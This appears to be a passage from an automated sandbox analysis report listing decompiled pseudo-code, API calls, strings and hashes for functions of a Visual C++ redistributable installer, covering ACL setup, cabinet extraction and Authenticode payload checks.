                                                                          			}















                                                                          APIs
                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,746AF730,00000000,?,?,?,?,0003D439,?), ref: 0003D145
                                                                          • ReleaseMutex.KERNEL32(?,?,?,?,0003D439,?), ref: 0003D161
                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0003D1A4
                                                                          • ReleaseMutex.KERNEL32(?), ref: 0003D1BB
                                                                          • SetEvent.KERNEL32(?), ref: 0003D1C4
                                                                          Strings
                                                                          • Failed to get message from netfx chainer., xrefs: 0003D1E5
                                                                          • Failed to send files in use message from netfx chainer., xrefs: 0003D20A
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: MutexObjectReleaseSingleWait$Event
                                                                          • String ID: Failed to get message from netfx chainer.$Failed to send files in use message from netfx chainer.
                                                                          • API String ID: 2608678126-3424578679
                                                                          • Opcode ID: 99c20843e30850209204633a6e559a00de1247e0e4f05a73d3c5d9a4e6889baa
                                                                          • Instruction ID: ebe034b0390caa287420aac88d020ae0c300aa4ee9deaa657384ad28c781c856
                                                                          • Opcode Fuzzy Hash: 99c20843e30850209204633a6e559a00de1247e0e4f05a73d3c5d9a4e6889baa
                                                                          • Instruction Fuzzy Hash: 5E31C731900709BFDB129FA4DC08EEFBBF9EF54321F108666F955A6261C735E9448B90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 73%
                                                                          			E00028BE5(void* __ecx, intOrPtr _a4, WCHAR* _a8) {
                                                                          				char _v8;
                                                                          				struct _ACL _v16;
                                                                          				void* _t12;
                                                                          				signed short _t20;
                                                                          				signed short _t21;
                                                                          				char _t30;
                                                                          				void* _t31;
                                                                          				signed short _t35;
                                                                          
                                                                          				_t12 = 0x20000004;
                                                                          				_t30 = 0;
                                                                          				_v16.AclRevision = 0;
                                                                          				_v16.AceCount = 0;
                                                                          				_v8 = 0;
                                                                          				_t36 = _a4;
                                                                          				if(_a4 == 0) {
                                                                          					L7:
                                                                          					_t31 = E000554F8( &_v16, _a8, 1, _t12, _t30, 0,  &_v16, 0, 3, 0x7d0);
                                                                          					SetFileAttributesW(_a8, 0x80);
                                                                          				} else {
                                                                          					if(E00028003(__ecx, _t36, 0x1a,  &_v8) >= 0) {
                                                                          						_t20 = InitializeAcl( &_v16, 8, 2);
                                                                          						__eflags = _t20;
                                                                          						if(_t20 != 0) {
                                                                          							_t30 = _v8;
                                                                          							_t12 = 0x20000005;
                                                                          							goto L7;
                                                                          						} else {
                                                                          							_t21 = GetLastError();
                                                                          							__eflags = _t21;
                                                                          							_t35 =  <=  ? _t21 : _t21 & 0x0000ffff | 0x80070000;
                                                                          							__eflags = _t35;
                                                                          							_t31 =  >=  ? 0x80004005 : _t35;
                                                                          							E000137D3(0x80004005, "cache.cpp", 0x601, _t31);
                                                                          							_push("Failed to initialize ACL.");
                                                                          							goto L3;
                                                                          						}
                                                                          					} else {
                                                                          						_push("Failed to allocate administrator SID.");
                                                                          						L3:
                                                                          						_push(_t31);
                                                                          						E0005012F();
                                                                          						_t30 = _v8;
                                                                          					}
                                                                          				}
                                                                          				if(_t30 != 0) {
                                                                          					E00013999(_t30);
                                                                          				}
                                                                          				return _t31;
                                                                          			}












                                                                          APIs
                                                                          • InitializeAcl.ADVAPI32(?,00000008,00000002,0000001A,00000000,?,00000000,00000000,?,?,00000000,00000000,?,?,-00000004,00000000), ref: 00028C30
                                                                          • GetLastError.KERNEL32(?,?,?,00000001), ref: 00028C3A
                                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,00000001,20000004,00000000,00000000,?,00000000,00000003,000007D0,?,00000000,00000000,?,?), ref: 00028C9A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesErrorFileInitializeLast
                                                                          • String ID: @Met$Failed to allocate administrator SID.$Failed to initialize ACL.$cache.cpp
                                                                          • API String ID: 669721577-176173597
                                                                          • Opcode ID: cc99026120cab5c65db5e129a083ff54351d9bfbc5d8703ea93d079670adfc2b
                                                                          • Instruction ID: acc3934f9258680b315b4cd27c3f83bbb2355948de9b7dfef8e6c2d69521aba5
                                                                          • Opcode Fuzzy Hash: cc99026120cab5c65db5e129a083ff54351d9bfbc5d8703ea93d079670adfc2b
                                                                          • Instruction Fuzzy Hash: 4A21D876A45324BBEB209E999C86F9FB7A9EB44711F118029FD04F7180EB719E0097A0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 82%
                                                                          			E0001410D(void* __ecx, WCHAR** _a4) {
                                                                          				long _v8;
                                                                          				long _t6;
                                                                          				void* _t12;
                                                                          				WCHAR* _t18;
                                                                          				long _t19;
                                                                          				WCHAR** _t23;
                                                                          				long _t26;
                                                                          
                                                                          				_t18 = 0;
                                                                          				_t23 = _a4;
                                                                          				_t6 = 0;
                                                                          				_v8 = 0;
                                                                          				_t26 = 0;
                                                                          				if(_t23 == 0 ||  *_t23 == 0) {
                                                                          					L5:
                                                                          					_t19 = GetCurrentDirectoryW(_t6, _t18);
                                                                          					if(_t19 != 0) {
                                                                          						if(_v8 >= _t19) {
                                                                          							goto L12;
                                                                          						}
                                                                          						_t26 = E00011EDE(_t23, _t19);
                                                                          						if(_t26 >= 0 && GetCurrentDirectoryW(_t19,  *_t23) == 0) {
                                                                          							_t30 =  <=  ? GetLastError() : _t11 & 0x0000ffff | 0x80070000;
                                                                          							_t12 = 0x80004005;
                                                                          							_t26 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t11 & 0x0000ffff | 0x80070000;
                                                                          							_push(_t26);
                                                                          							_push(0x190);
                                                                          							L11:
                                                                          							_push("dirutil.cpp");
                                                                          							E000137D3(_t12);
                                                                          						}
                                                                          						goto L12;
                                                                          					}
                                                                          					_t33 =  <=  ? GetLastError() : _t14 & 0x0000ffff | 0x80070000;
                                                                          					_t12 = 0x80004005;
                                                                          					_t26 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t14 & 0x0000ffff | 0x80070000;
                                                                          					_push(_t26);
                                                                          					_push(0x187);
                                                                          					goto L11;
                                                                          				} else {
                                                                          					_t26 = E0001275D( *_t23,  &_v8);
                                                                          					if(_t26 < 0) {
                                                                          						L12:
                                                                          						return _t26;
                                                                          					}
                                                                          					_t6 = _v8;
                                                                          					if(_t6 != 0) {
                                                                          						_t18 =  *_t23;
                                                                          					}
                                                                          					goto L5;
                                                                          				}
                                                                          			}











                                                                          APIs
                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?,00000000,crypt32.dll,?,?,00023ED4,00000001,feclient.dll,?,00000000,?,?,?,00014A0C), ref: 00014148
                                                                          • GetLastError.KERNEL32(?,?,00023ED4,00000001,feclient.dll,?,00000000,?,?,?,00014A0C,?,?,0005B478,?,00000001), ref: 00014154
                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,?,?,00000000,?,?,00023ED4,00000001,feclient.dll,?,00000000,?,?,?,00014A0C,?), ref: 0001418F
                                                                          • GetLastError.KERNEL32(?,?,00023ED4,00000001,feclient.dll,?,00000000,?,?,?,00014A0C,?,?,0005B478,?,00000001), ref: 00014199
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentDirectoryErrorLast
                                                                          • String ID: @Met$crypt32.dll$dirutil.cpp
                                                                          • API String ID: 152501406-140968552
                                                                          • Opcode ID: 4f8e2f1e2ca53eae4bdad1a89228efa09294c51accbc22e9b601f594c5fb3afe
                                                                          • Instruction ID: 430ccff86eaaee4ce001fe1f3705c21f85a891a21459c331235666cccb9e80b6
                                                                          • Opcode Fuzzy Hash: 4f8e2f1e2ca53eae4bdad1a89228efa09294c51accbc22e9b601f594c5fb3afe
                                                                          • Instruction Fuzzy Hash: 2B11B976E00726BBE7219AA98CC4BEBB6ECDF14791B110135FD04E7260E765DC8086E0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 50%
                                                                          			E0001999B(intOrPtr* _a4, intOrPtr _a8) {
                                                                          				signed int _v8;
                                                                          				intOrPtr _v12;
                                                                          				intOrPtr _v16;
                                                                          				signed char _t18;
                                                                          				intOrPtr _t19;
                                                                          				intOrPtr _t26;
                                                                          				void* _t31;
                                                                          
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				_t30 = _a4;
                                                                          				_t31 = E000171CF(_a8,  *((intOrPtr*)(_a4 + 0x14)),  &_v8, 0);
                                                                          				if(_t31 >= 0) {
                                                                          					_t18 = GetFileAttributesW(_v8);
                                                                          					if(_t18 != 0xffffffff) {
                                                                          						asm("xorps xmm0, xmm0");
                                                                          						asm("movlpd [ebp-0xc], xmm0");
                                                                          						if((_t18 & 0x00000010) == 0) {
                                                                          							goto L7;
                                                                          						} else {
                                                                          							_t26 = 1;
                                                                          							_t19 = 0;
                                                                          							goto L8;
                                                                          						}
                                                                          						L16:
                                                                          					} else {
                                                                          						_t31 =  <=  ? GetLastError() : _t25 & 0x0000ffff | 0x80070000;
                                                                          						if(_t31 == 0x80070002 || _t31 == 0x80070003) {
                                                                          							_t31 = 0;
                                                                          						}
                                                                          						asm("xorps xmm0, xmm0");
                                                                          						asm("movlpd [ebp-0xc], xmm0");
                                                                          						L7:
                                                                          						_t26 = _v16;
                                                                          						_t19 = _v12;
                                                                          					}
                                                                          					L8:
                                                                          					if(_t31 >= 0) {
                                                                          						_t31 = E00018152(_a8,  *((intOrPtr*)(_t30 + 4)), _t26, _t19, 0);
                                                                          						if(_t31 < 0) {
                                                                          							_push("Failed to set variable.");
                                                                          							goto L14;
                                                                          						}
                                                                          					} else {
                                                                          						_push(_v8);
                                                                          						E0005012F(_t31, "Failed while searching directory search: %ls, for path: %ls",  *_t30);
                                                                          					}
                                                                          				} else {
                                                                          					_push("Failed to format variable string.");
                                                                          					L14:
                                                                          					_push(_t31);
                                                                          					E0005012F();
                                                                          				}
                                                                          				E00012793(_v8);
                                                                          				return _t31;
                                                                          				goto L16;
                                                                          			}











                                                                          APIs
                                                                          • _MREFOpen@16.MSPDB140-MSVCRT ref: 000199B6
                                                                          • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,000002C0,00000100), ref: 000199CE
                                                                          • GetLastError.KERNEL32 ref: 000199D9
                                                                          Strings
                                                                          • Failed to set variable., xrefs: 00019A4E
                                                                          • Failed to format variable string., xrefs: 000199C1
                                                                          • Failed while searching directory search: %ls, for path: %ls, xrefs: 00019A16
                                                                          • @Met, xrefs: 000199D9
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesErrorFileLastOpen@16
                                                                          • String ID: @Met$Failed to format variable string.$Failed to set variable.$Failed while searching directory search: %ls, for path: %ls
                                                                          • API String ID: 1811509786-2166368626
                                                                          • Opcode ID: c89956ce63e28282d7bc6d0de5189c44db8b65256e265fe447c17ec8e666af10
                                                                          • Instruction ID: eadd023be1a1a901b674d9034465a95427df3d8fad3eb98aa64e8ee8d152e799
                                                                          • Opcode Fuzzy Hash: c89956ce63e28282d7bc6d0de5189c44db8b65256e265fe447c17ec8e666af10
                                                                          • Instruction Fuzzy Hash: 61210832E40225B7DB119AA8CC12BEEB769EF14321F208316FD10B6191D7315ED49AD2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 61%
                                                                          			E000308F0(void* __ecx, void* _a8, long _a12) {
                                                                          				long _v8;
                                                                          				intOrPtr _t25;
                                                                          				signed short _t30;
                                                                          				intOrPtr _t41;
                                                                          				signed int _t44;
                                                                          				struct _OVERLAPPED* _t48;
                                                                          				long _t54;
                                                                          
                                                                          				_t44 =  *0x7aac0; // 0x0
                                                                          				_t48 = 0;
                                                                          				_v8 = 0;
                                                                          				_t41 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t44 * 4)) + 4));
                                                                          				_t25 =  *((intOrPtr*)(_t41 + 0x2c));
                                                                          				if(_t25 == 0) {
                                                                          					if(WriteFile( *(_t41 + 0x3c), _a8, _a12,  &_v8, 0) == 0) {
                                                                          						_t30 = GetLastError();
                                                                          						_t52 =  <=  ? _t30 : _t30 & 0x0000ffff | 0x80070000;
                                                                          						_t48 =  >=  ? 0x80004005 :  <=  ? _t30 : _t30 & 0x0000ffff | 0x80070000;
                                                                          						E000137D3(0x80004005, "cabextract.cpp", 0x304, _t48);
                                                                          						_push("Failed to write during cabinet extraction.");
                                                                          						goto L6;
                                                                          					}
                                                                          				} else {
                                                                          					if(_t25 == 1) {
                                                                          						_t54 = _a12;
                                                                          						E00031664( *((intOrPtr*)(_t41 + 0x40)) +  *((intOrPtr*)(_t41 + 0x48)),  *((intOrPtr*)(_t41 + 0x44)) -  *((intOrPtr*)(_t41 + 0x48)), _a8, _t54);
                                                                          						 *((intOrPtr*)(_t41 + 0x48)) =  *((intOrPtr*)(_t41 + 0x48)) + _t54;
                                                                          						_v8 = _t54;
                                                                          					} else {
                                                                          						_t48 = 0x8007139f;
                                                                          						_push("Unexpected call to CabWrite().");
                                                                          						L6:
                                                                          						E0005012F();
                                                                          						_t44 = _t48;
                                                                          					}
                                                                          				}
                                                                          				 *((intOrPtr*)(_t41 + 0x30)) = _t48;
                                                                          				_t29 =  <  ? _t44 | 0xffffffff : _v8;
                                                                          				return  <  ? _t44 | 0xffffffff : _v8;
                                                                          			}











                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWrite_memcpy_s
                                                                          • String ID: @Met$Failed to write during cabinet extraction.$Unexpected call to CabWrite().$cabextract.cpp
                                                                          • API String ID: 1970631241-130182655
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 61%
                                                                          			E000509BB(void* __ecx, intOrPtr _a4, intOrPtr* _a8) {
                                                                          				char _v8;
                                                                          				_Unknown_base(*)()* _t7;
                                                                          				char _t18;
                                                                          
                                                                          				_t18 = 0;
                                                                          				_v8 = 0;
                                                                          				_t7 = GetProcAddress(GetModuleHandleW(L"kernel32"), "IsWow64Process");
                                                                          				if(_t7 == 0) {
                                                                          					L3:
                                                                          					 *_a8 = _v8;
                                                                          				} else {
                                                                          					_push( &_v8);
                                                                          					_push(_a4);
                                                                          					if( *_t7() != 0) {
                                                                          						goto L3;
                                                                          					} else {
                                                                          						_t22 =  <=  ? GetLastError() : _t10 & 0x0000ffff | 0x80070000;
                                                                          						_t18 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t10 & 0x0000ffff | 0x80070000;
                                                                          						E000137D3(0x80004005, "procutil.cpp", 0x4e, _t18);
                                                                          					}
                                                                          				}
                                                                          				return _t18;
                                                                          			}







                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00015D8F,00000000), ref: 000509CF
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 000509D6
                                                                          • GetLastError.KERNEL32(?,?,?,00015D8F,00000000), ref: 000509ED
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AddressErrorHandleLastModuleProc
                                                                          • String ID: @Met$IsWow64Process$kernel32$procutil.cpp
                                                                          • API String ID: 4275029093-3284291680
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 47%
                                                                          			E0002A998(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                          				signed int _v8;
                                                                          				intOrPtr _v12;
                                                                          				intOrPtr _v16;
                                                                          				intOrPtr _v20;
                                                                          				char _v24;
                                                                          				intOrPtr _v28;
                                                                          				intOrPtr _v36;
                                                                          				intOrPtr _v40;
                                                                          				char _v44;
                                                                          				signed int _v52;
                                                                          				intOrPtr _v60;
                                                                          				intOrPtr _v64;
                                                                          				char* _v68;
                                                                          				intOrPtr _v72;
                                                                          				intOrPtr _v80;
                                                                          				char _v92;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t32;
                                                                          				signed short _t40;
                                                                          				signed short _t45;
                                                                          				signed short _t48;
                                                                          				void* _t63;
                                                                          				char _t65;
                                                                          				signed int _t77;
                                                                          
                                                                          				_t63 = __edx;
                                                                          				_t32 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t32 ^ _t77;
                                                                          				_v28 = _a4;
                                                                          				_t55 = _a8;
                                                                          				asm("stosd");
                                                                          				_v24 = 0xaac56b;
                                                                          				_v20 = 0x11d0cd44;
                                                                          				asm("stosd");
                                                                          				_v16 = 0xc000c28c;
                                                                          				_v12 = 0xee95c24f;
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				_t65 = 0x30;
                                                                          				E0003F670(_t65,  &_v92, 0, _t65);
                                                                          				_v44 = 0x10;
                                                                          				_v40 = _a8;
                                                                          				_v68 =  &_v44;
                                                                          				_v36 = _a12;
                                                                          				_push( &_v92);
                                                                          				_t40 =  &_v24;
                                                                          				_v92 = _t65;
                                                                          				_v52 = 0x80;
                                                                          				_push(_t40);
                                                                          				_push(0xffffffff);
                                                                          				_v72 = 1;
                                                                          				_v64 = 1;
                                                                          				_v80 = 2;
                                                                          				L0004F42C();
                                                                          				if(_t40 == 0) {
                                                                          					L3:
                                                                          					_push(_v60);
                                                                          					L0004F44C();
                                                                          					if(_t40 != 0) {
                                                                          						_push(0);
                                                                          						_push(0);
                                                                          						_push(0);
                                                                          						_push(_t40);
                                                                          						L0004F43C();
                                                                          						if(_t40 != 0) {
                                                                          							_t67 = E00029080(_v28,  *((intOrPtr*)(_t40 + 0x28)));
                                                                          							if(_t67 < 0) {
                                                                          								_push("Failed to verify expected payload against actual certificate chain.");
                                                                          								goto L9;
                                                                          							}
                                                                          						} else {
                                                                          							_t45 = GetLastError();
                                                                          							_t70 =  <=  ? _t45 : _t45 & 0x0000ffff | 0x80070000;
                                                                          							_t67 =  >=  ? 0x80004005 :  <=  ? _t45 : _t45 & 0x0000ffff | 0x80070000;
                                                                          							E000137D3(0x80004005, "cache.cpp", 0x3f0, _t67);
                                                                          							_push("Failed to get signer chain from authenticode certificate.");
                                                                          							goto L9;
                                                                          						}
                                                                          					} else {
                                                                          						_t48 = GetLastError();
                                                                          						_t73 =  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
                                                                          						_t67 =  >=  ? 0x80004005 :  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
                                                                          						E000137D3(0x80004005, "cache.cpp", 0x3ed, _t67);
                                                                          						_push("Failed to get provider state from authenticode certificate.");
                                                                          						L9:
                                                                          						_push(_t67);
                                                                          						E0005012F();
                                                                          					}
                                                                          				} else {
                                                                          					_v52 = _v52 | 0x00001000;
                                                                          					_push( &_v92);
                                                                          					_t40 =  &_v24;
                                                                          					_push(_t40);
                                                                          					_push(0xffffffff);
                                                                          					L0004F42C();
                                                                          					if(_t40 == 0) {
                                                                          						goto L3;
                                                                          					} else {
                                                                          						_t76 =  <=  ? _t40 : _t40 & 0x0000ffff | 0x80070000;
                                                                          						_t67 =  >=  ? 0x80004005 :  <=  ? _t40 : _t40 & 0x0000ffff | 0x80070000;
                                                                          						E000137D3(0x80004005, "cache.cpp", 0x3e9,  >=  ? 0x80004005 :  <=  ? _t40 : _t40 & 0x0000ffff | 0x80070000);
                                                                          						E0005012F( >=  ? 0x80004005 :  <=  ? _t40 : _t40 & 0x0000ffff | 0x80070000, "Failed authenticode verification of payload: %ls", _t55);
                                                                          					}
                                                                          				}
                                                                          				return E0003DE36(_t55, _v8 ^ _t77, _t63, _t65, _t67);
                                                                          			}






























                                                                          0x0002ab39

                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,000000FF,00AAC56B,?,000152B5,00000000,0001533D), ref: 0002AA90
                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,00000000,?,000000FF,00AAC56B,?,000152B5,00000000,0001533D), ref: 0002AAD4
                                                                          Strings
                                                                          • Failed to verify expected payload against actual certificate chain., xrefs: 0002AB1A
                                                                          • Failed to get signer chain from authenticode certificate., xrefs: 0002AB02
                                                                          • cache.cpp, xrefs: 0002AA66, 0002AAB4, 0002AAF8
                                                                          • Failed to get provider state from authenticode certificate., xrefs: 0002AABE
                                                                          • @Met, xrefs: 0002AA90, 0002AAD4
                                                                          • Failed authenticode verification of payload: %ls, xrefs: 0002AA71
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: @Met$Failed authenticode verification of payload: %ls$Failed to get provider state from authenticode certificate.$Failed to get signer chain from authenticode certificate.$Failed to verify expected payload against actual certificate chain.$cache.cpp
                                                                          • API String ID: 1452528299-1404453347
                                                                          • Opcode ID: 98276ab43d3a45a3ac4478ceb17ee4e9a80875e0e8d402434fb5db14f80acf53
                                                                          • Instruction ID: ffbe794aa4a11180cdde3ebe760ed937a42870d08192dd1e97994a5f2731a889
                                                                          • Opcode Fuzzy Hash: 98276ab43d3a45a3ac4478ceb17ee4e9a80875e0e8d402434fb5db14f80acf53
                                                                          • Instruction Fuzzy Hash: 0C41DAB1E00329ABEB119BA9DD46BEF7BE8EF05310F00012AFD05F7181DB35994486E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 21%
                                                                          			E0002F586(void* __ecx, intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                                                          				char _v8;
                                                                          				char _v12;
                                                                          				intOrPtr* _t46;
                                                                          				intOrPtr* _t58;
                                                                          				intOrPtr* _t59;
                                                                          				void* _t62;
                                                                          
                                                                          				_t48 = __ecx;
                                                                          				_push(__ecx);
                                                                          				_push(__ecx);
                                                                          				_v12 = 0;
                                                                          				_v8 = 0;
                                                                          				EnterCriticalSection( *(_a4 + 0xc));
                                                                          				_t62 = E0001D459( *(_a4 + 0xc) + 0xb8);
                                                                          				if(_t62 >= 0) {
                                                                          					_t46 = _a16;
                                                                          					if(_t46 == 0 ||  *_t46 == 0) {
                                                                          						L20:
                                                                          						_t62 = 0x80070057;
                                                                          					} else {
                                                                          						_t58 = _a12;
                                                                          						if(_t58 == 0 ||  *_t58 == 0) {
                                                                          							_t59 = _a8;
                                                                          							if(_t59 == 0 ||  *_t59 == 0) {
                                                                          								goto L20;
                                                                          							} else {
                                                                          								_t62 = E0001C0A9(_t48,  *(_a4 + 0xc) + 0x2a8, _t59,  &_v12);
                                                                          								if(_t62 >= 0) {
                                                                          									_t62 = E000121A5(_v12 + 0x28, _t46, 0);
                                                                          									if(_t62 < 0) {
                                                                          										_push("Failed to set source path for container.");
                                                                          										goto L19;
                                                                          									}
                                                                          								} else {
                                                                          									_push(_t59);
                                                                          									_push("UX requested unknown container with id: %ls");
                                                                          									goto L16;
                                                                          								}
                                                                          							}
                                                                          						} else {
                                                                          							_t62 = E0001CC57(_t48,  *(_a4 + 0xc) + 0x2b8, _t58,  &_v8);
                                                                          							if(_t62 >= 0) {
                                                                          								_t41 = _v8;
                                                                          								if( *((intOrPtr*)(_v8 + 4)) != 2) {
                                                                          									_t62 = E000121A5(_t41 + 0x38, _t46, 0);
                                                                          									if(_t62 < 0) {
                                                                          										_push("Failed to set source path for payload.");
                                                                          										L19:
                                                                          										_push(_t62);
                                                                          										E0005012F();
                                                                          									}
                                                                          								} else {
                                                                          									_push(_t58);
                                                                          									_t62 = 0x800710dd;
                                                                          									_push("UX denied while trying to set source on embedded payload: %ls");
                                                                          									goto L16;
                                                                          								}
                                                                          							} else {
                                                                          								_push(_t58);
                                                                          								_push("UX requested unknown payload with id: %ls");
                                                                          								L16:
                                                                          								_push(_t62);
                                                                          								E0005012F();
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					_push("Engine is active, cannot change engine state.");
                                                                          					_push(_t62);
                                                                          					E0005012F();
                                                                          				}
                                                                          				LeaveCriticalSection( *(_a4 + 0xc));
                                                                          				return _t62;
                                                                          			}










                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(?), ref: 0002F59B
                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0002F6A8
                                                                          Strings
                                                                          • user is active, cannot change user state., xrefs: 0002F5B5
                                                                          • UX denied while trying to set source on embedded payload: %ls, xrefs: 0002F61D
                                                                          • Failed to set source path for container., xrefs: 0002F68D
                                                                          • UX requested unknown container with id: %ls, xrefs: 0002F667
                                                                          • UX requested unknown payload with id: %ls, xrefs: 0002F607
                                                                          • Failed to set source path for payload., xrefs: 0002F637
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
